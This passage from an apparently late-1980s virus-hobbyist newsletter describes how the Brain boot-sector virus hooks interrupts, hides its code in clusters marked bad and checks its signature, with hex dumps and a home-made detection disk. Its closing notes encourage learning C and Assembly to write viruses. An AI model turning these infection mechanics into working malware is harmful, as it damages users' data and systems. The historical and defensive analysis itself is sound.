boot" and wait fifteen seconds before you turn the machine back on, there is no possible way for the virus to infect that disk. Once you shut the machine off, RAM is empty. NOTHING can possibly survive in RAM after the machine has been shut off. Even if you did do a warm boot, and the virus survived, just have that clean boot disk write protected and the virus won't be able to infect it. How The Virus Infects A Disk ----------------------------- When a Brain infected disk is inserted into a system, the virus first copies itself to the highest area in memory. It resets the memory size by altering interrupt vector A2H so as to protect the RAM resident virus. It also resets interrupt vector 13H to point to the virus code in high memory and resets interrupt vector 6H (unused under existing versions of DOS) to point to the original interrupt vector, 13H. After the normal boot process is continued with the loading of both IBMIO.COM and IBMDOS.COM under PC-DOS or IO.SYS and MSDOS.SYS under MS-DOS. The infected disk contains a message and part of the virus code in the boot sector. The remainder of the code and a copy of the original boot sector is contained in three clusters (six sectors) that the virus has labeled "bad" in the FAT. Figure 1 shows a map of an infected disk obtained by using Central Point Software's PC Tools Deluxe. Figure 1: ----------------------------------------------------------------------------- Entire Disk Mapped 80% free space Track 1 1 2 2 3 3 3 Double Sided 0 5 0 5 0 5 0 5 9 Booooo.....+++++++++++++++++++++++++++++++ Side 0 Fooooo.....+++++++++++++++++++++++++++++++ Fooooo..X..+++++++++++++++++++++++++++++++ Doooooo.X..+++++++++++++++++++++++++++++++ -----------Doooooo.X..+++++++++++++++++++++++++++++++ Dooooo.....+++++++++++++++++++++++++++++++ Side 1 oooooo.....+++++++++++++++++++++++++++++++ oooooo.....+++++++++++++++++++++++++++++++ oooooo.....+++++++++++++++++++++++++++++++ Explanation Of Codes: + Available . Allocated B Boot Record o Hidden F File Alloc. Table r Read Only D Directory X Bad Cluster ----------------------------------------------------------------------------- With the virus in upper RAM it is not possible to read the infected boot sector. If an attempt is made to read the boot sector, the Brain re-directs the request to read the original boot sector that is stored in one of the bad sectors. The only way tp read the Brain message contained in the boot sector, is to boot a system with a non-infected disk, preferably with a write protect tab. Replace the boot disk with a write protected version of PC Tools and place an infected disk in drive B. Figure 2 shows the embedded message by using PC Tools to read the infected disk's boot sector. Figure 2: ----------------------------------------------------------------------------- Displacement -----------------HEX Values-------------------- ASCII Value 0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F Welcome to 0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 the Dungeon 0048 (0030) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0064 (0040) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0080 (0050) 20 28 63 29 20 31 39 38 36 20 42 61 73 69 74 20 (C) 1986 Basit 0096 (0060) 26 20 41 6D 6A 61 64 20 28 70 76 74 29 20 4C 74 & Amjad (pvt) Lt 0112 (0070) 64 2E 20 20 20 20 20 20 20 20 20 20 20 20 20 20 d 0128 (0080) 20 42 52 41 49 4E 20 43 4F 4D 50 55 54 45 52 20 BRAIN COMPUTER 0144 (0090) 53 45 52 56 49 43 45 53 2E 2E 37 33 30 20 4E 49 SERVICES 730 NI 0160 (00A0) 54 41 4D 20 42 4C 4F 43 4B 20 41 4C 4C 41 4D 41 ZAM BLOCK ALLAMA 0176 (00B0) 20 49 51 42 41 4C 20 54 4F 57 4E 20 20 20 20 20 IGBAL TOWN 0192 (00C0) 20 20 20 20 20 20 20 20 20 20 20 4C 41 48 4F 52 LAHOR 0208 (00D0) 45 2D 50 41 4B 49 53 54 41 4E 2E 2E 50 48 4F 4E E-PAKISTAN PHON 0224 (00E0) 45 20 3A 34 33 30 37 39 31 2C 34 34 33 32 34 38 E 430791.443248 0240 (00F0) 2C 32 38 30 35 33 30 2E 20 20 20 20 20 20 20 20 .280530 0256 (0100) 20 20 42 65 77 61 72 65 20 6F 66 20 74 68 69 73 Beware of this 0272 (0110) 20 56 49 52 55 53 2E 2E 2E 2E 2E 43 6F 6E 74 61 VIRUS.....Conta 0288 (0120) 63 74 20 75 73 20 66 6F 72 20 76 61 63 63 69 6E ct us for vaccin 0304 (0130) 61 74 69 6F 6E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E ation....... ----------------------------------------------------------------------------- The virus, residing in high memory, interrupts and disk READ request. If that request is not for the boot sector or non-floppy drive, the virus reads the boot sector of the disk. It examines the 4th and 5th bytes for "1234" that are stored as 34 12, the signature of the Brain. If that signature is not present on the floppy disk, the virus infects the disk then proceeds with the READ command. If the disk is already infected, the virus does not re-infect the disk but instead continues with the READ. Also if the disk is write protected, the infection will be terminated. Figure 3 is a comparison of the initial po- rtion of a good and an infected boot sector. Figure 3: ----------------------------------------------------------------------------- GOOD Boot Sector: Displacement -----------------HEX Values-------------------- 0000 (0000) EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00 0016 (0010) 02 70 00 D0 02 FD 02 00 09 00 02 00 00 00 00 00 0032 (0020) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BAD Boot Sector: Displacement -----------------HEX Values-------------------- 0000 (0000) FA E9 4A 01 34 12 01 02 27 00 01 00 00 00 00 20 0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F 0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 ----------------------------------------------------------------------------- Normally the virus, in its attempt to infect a disk, will search for three consecutive clusters it can mark as "bad". If there are no blank clusters, the virus will not infect the disk. However, if there is only one blank cluster and it is neither of the last two clusters on the disk, the virus will select the one blank cluster and overwrite the next two clusters and mark all three as bad. If the overwritten material is part of a file, that file no longer can be executed if it is a program, or read if it is a data file. This is one way in which a user might learn that a disk has been infected. Poor Man's Filter ----------------- In our laboratory testing we found a simple, inexpensive method to protect a disk from becoming infected by the Brain virus by checking if the virus is in high memory. It is possible to prepare a test disk by following these simple steps. 1. Format a floppy disk with or without a system. 2. Use DEBUG.COM or PC Tools to edit the boot sector. The first line of the boot sector appears as: EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00 ----- 3. Since the Brain examines the fifth and sixth bytes for its signature, change those bytes to the virus' signature, 1234. Below is an altered first line of a boot sector: EB 34 90 49 34 12 20 20 33 2E 32 00 02 02 01 00 ----- Place this altered test disk in drive B and after the system prompt, A>, type: DIR B: to obtain a directory of the test disk. If the system is infected by the Brain virus, the following message will appear on the screen: Not ready, error reading Drive B Abort, Retry, Ignore? The disk with the altered boot sector will work only on a non-infected system. ***************************************************************************** The Alvi brothers, Basit and Amjad, sell compatible PCs in their store in Lebore, Pakistan. When contacted by a reporter for "The Chronicle of Higher Education," the 19-year old Basit Alvi admitted writing the virus and placing it on a disk in 1986 "for fun." He reportedly gave a copy of the virus prog- ram to a friend, another student. However, both brothers were at a loss in explaining how the virus emigrated to the States. ***************************************************************************** Final Notes: ------------ Thanks to Midnight Cowboy for writing those articles and showing interest in the newsletter. Sorry I did not include them but I came to the conclusion that there is not much use for batch file virii when there are languages such as C and Assembly. I do appreciate the effort, though. Someone was SUPPOSED to write me a article for the Sample Source Code Dept. on Pascal virii, but they never did it for me, just wanted to say thanks to that person. I got some bad feedback on my last issue of Viriisearch, and needless to say I didn't like it too much. This person didn't like the fact that I had gone over the C source code to ATTRB as much as I did. Well, I decided to go over the source code really well because ATTRB is a well written program, as well as a simple program, so I figured it would make you non C programmers inter- ested in C and for you beginner C programmers, it would make you into a better C programmer. What I covered on ATTRB last issue took me quite a while to learn on my own and the knowledge is there for the taking. If you didn't like it because you didn't understand it, I suggest you start learning C or Assem- bly because that is, most likely, the only programming languages you will find in this newsletter. And what does an attributes program have to do with virii? Well, a lot of virii do have to change attributes on files and there was a very well written, tight program to do it, in the last issue. Speaking of feedback, the more the better. Starting in the next issue, #4, I will be featuring reader's feedback, which I will reply to. Provided I get enough feedback. I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated entirely to computer virii. Until Next Time......Be Careful!!! * Criminal Minded * -----------------------------------------------------------------------------